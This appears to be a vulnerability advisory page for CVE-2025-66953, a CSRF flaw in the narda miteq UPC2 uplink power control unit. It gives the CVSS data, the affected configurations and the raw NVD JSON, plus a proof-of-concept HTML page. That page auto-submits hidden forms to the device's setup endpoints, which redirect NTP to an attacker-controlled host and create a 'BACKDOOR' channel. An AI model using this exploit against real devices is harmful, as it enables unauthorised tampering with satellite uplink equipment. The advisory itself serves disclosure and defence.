Security Vulnerability Report
中文
CVE-2025-66953 CVSS 8.8 HIGH

CVE-2025-66953

Published: 2025-12-17 19:16:12
Last Modified: 2026-01-02 19:47:40

Description

CSRF vulnerability in narda miteq Uplink Power Contril Unit UPC2 v.1.17 allows a remote attacker to execute arbitrary code via the Web-based management interface and specifically the /system_setup.htm, /set_clock.htm, /receiver_setup.htm, /cal.htm?..., and /channel_setup.htm endpoints

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:nardamiteq:upc2_firmware:1.17:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:nardamiteq:upc2:-:*:*:*:*:*:*:* - NOT VULNERABLE
narda miteq UPC2 v1.17

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-66953 --> <!-- Target: narda miteq UPC2 v1.17 --> <!-- Vulnerability: CSRF on multiple endpoints --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - CVE-2025-66953</title> </head> <body> <h1>CSRF PoC for narda miteq UPC2</h1> <p>Target: http://[TARGET_IP]</p> <!-- System Settings CSRF --> <h2>System Setup CSRF</h2> <form id="csrf1" action="http://[TARGET_IP]/system_setup.htm" method="POST"> <input type="hidden" name="sys_desc" value="CSRF_TEST"> <input type="hidden" name="sys_contact" value="[email protected]"> <input type="hidden" name="apply" value="1"> </form> <!-- Clock Settings CSRF --> <h2>Clock Setup CSRF</h2> <form id="csrf2" action="http://[TARGET_IP]/set_clock.htm" method="POST"> <input type="hidden" name="ntp_server" value="attacker.controlled.ntp"> <input type="hidden" name="timezone" value="0"> <input type="hidden" name="apply" value="1"> </form> <!-- Receiver Setup CSRF --> <h2>Receiver Setup CSRF</h2> <form id="csrf3" action="http://[TARGET_IP]/receiver_setup.htm" method="POST"> <input type="hidden" name="freq" value="12000000"> <input type="hidden" name="sr" value="1000000"> <input type="hidden" name="apply" value="1"> </form> <!-- Channel Setup CSRF --> <h2>Channel Setup CSRF</h2> <form id="csrf4" action="http://[TARGET_IP]/channel_setup.htm" method="POST"> <input type="hidden" name="ch_enable" value="1"> <input type="hidden" name="ch_name" value="BACKDOOR"> <input type="hidden" name="apply" value="1"> </form> <script> // Auto-submit all forms document.querySelectorAll('form').forEach(form => form.submit()); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66953", "sourceIdentifier": "[email protected]", "published": "2025-12-17T19:16:12.467", "lastModified": "2026-01-02T19:47:40.163", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CSRF vulnerability in narda miteq Uplink Power Contril Unit UPC2 v.1.17 allows a remote attacker to execute arbitrary code via the Web-based management interface and specifically the /system_setup.htm, /set_clock.htm, /receiver_setup.htm, /cal.htm?..., and /channel_setup.htm endpoints"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:nardamiteq:upc2_firmware:1.17:*:*:*:*:*:*:*", "matchCriteriaId": "34E0BDC4-B738-4422-86AA-5FA07A602FF2"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:nardamiteq:upc2:-:*:*:*:*:*:*:*", "matchCriteriaId": "AA36213C-711B-4CF5-9B26-DAB920297375"}]}]}], "references": [{"url": "https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-66953%20_%20narda%20miteq%20Uplink%20Power%20Contril%20Unitl%20UPC2%20_%20CSRF", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.nardamiteq.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-66953%20_%20narda%20miteq%20Uplink%20Power%20Contril%20Unitl%20UPC2%20_%20CSRF", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}